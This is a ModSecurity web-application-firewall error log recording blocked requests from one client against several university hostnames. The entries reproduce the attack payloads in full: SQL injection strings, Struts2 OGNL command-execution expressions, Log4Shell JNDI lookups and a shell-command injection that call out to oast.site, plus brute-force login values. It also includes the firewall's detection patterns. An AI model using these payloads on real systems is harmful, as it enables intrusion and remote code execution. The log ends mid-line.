[Tue Aug 29 11:34:01.607204 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OcCo-f0AAASAHfwAAAAH"]
[Tue Aug 29 11:34:02.056422 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OsCo-f0AAAPDoL4AAAAP"]
[Tue Aug 29 11:34:02.536782 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OsCo-f0AAAPLwEgAAAAX"]
[Tue Aug 29 11:34:02.581539 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11OsCo-f0AAAPLwEoAAAAX"]
[Tue Aug 29 11:34:03.304261 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11O8Co-f0AAASLqBkAAAAM"]
[Tue Aug 29 11:34:03.329405 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgwucw5y9odg3qg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAARy-6EAAAAb"]
[Tue Aug 29 11:34:03.334728 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg7iok7ijsmgznx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASMgewAAAAO"]
[Tue Aug 29 11:34:03.338720 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgjx9tfmt7wa7wh.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASRn-cAAAAW"]
[Tue Aug 29 11:34:03.386863 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgk38nqdchu1jte.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASLqB0AAAAM"]
[Tue Aug 29 11:34:03.406584 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgakpmr7pie1oja.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASLqB4AAAAM"]
[Tue Aug 29 11:34:04.350593 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "www.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11PMCo-f0AAAST4-YAAAAZ"]
[Tue Aug 29 11:34:04.378997 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgkwxtwuku633qb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11PMCo-f0AAAST4-cAAAAZ"]
[Tue Aug 29 11:34:04.392212 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlghf4ojzudn8mhp.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASRn-4AAAAW"]
[Tue Aug 29 11:34:04.399382 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgrat6t5pgeongx.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASNzocAAAAQ"]
[Tue Aug 29 11:34:05.325725 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "www.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11PcCo-f0AAASUX0IAAAAd"]
[Tue Aug 29 11:34:06.390697 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAQKOr8AAAAs"]
[Tue Aug 29 11:34:06.419299 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASLqCcAAAAM"]
[Tue Aug 29 11:34:06.423855 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASNzosAAAAQ"]
[Tue Aug 29 11:34:06.424210 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAASVoHIAAAAe"]
[Tue Aug 29 11:34:06.432538 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAR@KLMAAAAF"]
[Tue Aug 29 11:34:07.303234 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAAR@KLQAAAAF"]
[Tue Aug 29 11:34:07.303423 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAARjjVIAAAAL"]
[Tue Aug 29 11:34:07.307838 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASHh5sAAAAD"]
[Tue Aug 29 11:34:07.309074 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11P8Co-f0AAASS79sAAAAY"]
[Tue Aug 29 11:34:07.309591 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASUX0UAAAAd"]
[Tue Aug 29 11:34:07.315337 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASMgfkAAAAO"]
[Tue Aug 29 11:34:07.321507 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAST4-4AAAAZ"]
[Tue Aug 29 11:34:07.321639 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASGMscAAAAA"]
[Tue Aug 29 11:34:07.324285 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAAPDoMUAAAAP"]
[Tue Aug 29 11:34:07.328410 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 